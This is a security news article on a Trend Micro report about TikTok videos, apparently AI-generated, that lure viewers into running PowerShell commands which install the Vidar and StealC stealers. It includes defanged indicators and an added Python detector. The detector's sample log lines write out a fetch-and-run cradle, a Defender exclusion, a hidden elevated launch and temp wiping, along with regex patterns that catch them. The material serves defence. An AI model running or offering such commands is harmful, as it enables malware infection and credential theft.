
Trend Micro reveals a growing threat on TikTok, where AI-generated videos deceive users into running malicious PowerShell commands — exposing them to potent information-stealing malware.
In a recent exposé, Trend Micro uncovered a dangerous social engineering campaign that hijacks TikTok’s viral platform to distribute Vidar and StealC, two sophisticated information-stealing malware families. By leveraging AI-generated content and exploiting user trust, cybercriminals are transforming innocent video tutorials into vectors for malware.
“This attack uses videos (possibly AI-generated) to instruct users to execute PowerShell commands, which are disguised as software activation steps,” the report explains.
The campaign begins with TikTok accounts like @gitallowed, @zane.houghton, and @sysglow.wow sharing faceless tutorial videos that instruct viewers to activate software like Windows, Spotify, or CapCut. These videos, some garnering over half a million views, show step-by-step “activation” instructions that culminate in the viewer being told to run a PowerShell command.
“The videos instruct viewers to run a sequence of commands… The instructional voice also appears AI-generated, reinforcing the likelihood that AI tools are being used to produce these videos,” noted Trend Micro.
The command downloads and executes a remote script, initiating a malware dropper chain that is both stealthy and persistent.
Here’s a breakdown of how the attack unfolds:
- Users execute PowerShell commands directly after watching the TikTok video.
- A remote script from hxxps://allaivo[.]me/spotify is downloaded and run.
- Hidden directories are created in APPDATA and LOCALAPPDATA, and added to Windows Defender’s exclusion list.
- A secondary payload is downloaded — typically Vidar or StealC from hxxps://amssh[.]co/file.exe.
- A final persistence script is fetched from hxxps://amssh[.]co/script.ps1, enabling the malware to survive reboots.
- Logs and temp folders are deleted to obscure forensic evidence.
“The script employs retry logic to ensure that the payload is downloaded successfully, and then launches the malware executable as a hidden, elevated process,” Trend Micro warns.
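The chain described above leaves a recognizable trail in PowerShell script-block logging (Event ID 4104 from the Microsoft-Windows-PowerShell/Operational log, when script block logging is enabled). The following detector is an added example, not code from Trend Micro or from the article: it scans constructed 4104-style log lines for the stages the article lists (a remote download-and-execute cradle, Defender exclusions for AppData paths, a hidden elevated process launch, and deletion of logs or temp folders) and alerts only when a single host shows two or more of them. The regex patterns, the log line format, the host names and the `example.invalid` URLs are all assumptions made for the example, not the campaign's indicators.

```python
"""Added example: correlate PowerShell script-block events into the dropper chain stages."""
import re

# Hypothetical stage patterns, matched case-insensitively against the ScriptBlockText of a
# PowerShell script-block event. Each corresponds to one step of the chain in the article.
STAGE_RULES = {
    # remote script fetched and handed to Invoke-Expression (download-and-execute cradle)
    "download_cradle": re.compile(
        r"(?:iex|Invoke-Expression)\b.*?(?:irm|Invoke-RestMethod|iwr|Invoke-WebRequest|DownloadString)"
        r"|(?:irm|Invoke-RestMethod|iwr|Invoke-WebRequest|DownloadString).*?(?:\|\s*iex\b|Invoke-Expression)",
        re.I | re.S),
    # directories added to Windows Defender's exclusion list
    "defender_exclusion": re.compile(
        r"Add-MpPreference\b.*?-Exclusion(?:Path|Process|Extension)", re.I | re.S),
    # payload launched as a hidden, elevated process
    "hidden_elevated_launch": re.compile(
        r"Start-Process\b(?=.*-WindowStyle\s+Hidden)(?=.*-Verb\s+RunAs)", re.I | re.S),
    # logs or temp folders wiped to hinder forensics
    "evidence_cleanup": re.compile(
        r"Remove-Item\b.*?(?:\$env:TEMP|\\Temp\\|\\Logs?\\)", re.I | re.S),
}

# Constructed sample events in a simplified "<timestamp> <host> <event_id> <ScriptBlockText>"
# layout. Hosts and URLs are placeholders, not real indicators.
SAMPLE_EVENTS = [
    '2025-05-22T10:01:03Z WS-FINANCE-07 4104 iex (irm https://example.invalid/spotify)',
    '2025-05-22T10:01:05Z WS-FINANCE-07 4104 Add-MpPreference -ExclusionPath "$env:APPDATA\\.cache"',
    '2025-05-22T10:01:09Z WS-FINANCE-07 4104 Start-Process -FilePath "$env:APPDATA\\.cache\\file.exe" -WindowStyle Hidden -Verb RunAs',
    '2025-05-22T10:02:40Z WS-FINANCE-07 4104 Remove-Item -Recurse -Force "$env:TEMP\\*"',
    '2025-05-22T11:15:00Z WS-DEV-02 4104 Get-ChildItem -Recurse $env:TEMP | Measure-Object',
    '2025-05-22T11:16:00Z WS-DEV-02 4104 Invoke-WebRequest https://updates.example.invalid/tool.zip -OutFile tool.zip',
]


def parse_event(line):
    """Split one constructed log line into its fields; ignore non-4104 or malformed lines."""
    parts = line.split(maxsplit=3)
    if len(parts) < 4 or parts[2] != "4104":
        return None
    return {"time": parts[0], "host": parts[1], "script": parts[3]}


def classify(script_text):
    """Return the names of every stage pattern that matches this script block."""
    return [name for name, rx in STAGE_RULES.items() if rx.search(script_text)]


def correlate(lines, min_stages=2):
    """Collect stages per host in order of first observation.

    A lone download or a lone Remove-Item is ordinary admin activity, so only hosts that
    reach min_stages distinct stages are returned as alerts.
    """
    seen = {}
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        stages = seen.setdefault(ev["host"], [])
        for stage in classify(ev["script"]):
            if stage not in stages:
                stages.append(stage)
    return {host: stages for host, stages in seen.items() if len(stages) >= min_stages}


if __name__ == "__main__":
    for host, stages in correlate(SAMPLE_EVENTS).items():
        print(f"ALERT {host}: {' -> '.join(stages)}")
```

Run against the constructed events, WS-FINANCE-07 is reported with all four stages in order, while WS-DEV-02, which only downloads an archive with `-OutFile` and lists a temp folder, is not. In production the same correlation would be fed from the real 4104 events, and the `download_cradle` pattern alone is a reasonable lower-severity signal on endpoints where users are not expected to run PowerShell at all.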
Once active, the malware communicates with its C&C servers using novel evasion techniques:
- Vidar uses platforms like Steam and Telegram as Dead Drop Resolvers (DDR), hiding real server addresses in profile metadata.
- StealC connects directly to IP-based endpoints like 91[.]92[.]46[.]70.
“Vidar, in particular, abuses legitimate services like Steam and Telegram to serve as Dead Drop Resolvers,” the researchers state.
The abuse of TikTok’s algorithmic amplification, combined with AI-generated deception, marks a new era in malware delivery. As Trend Micro emphasizes: “The use of AI-generated content also elevates these kinds of attacks from isolated incidents to a highly scalable operation.”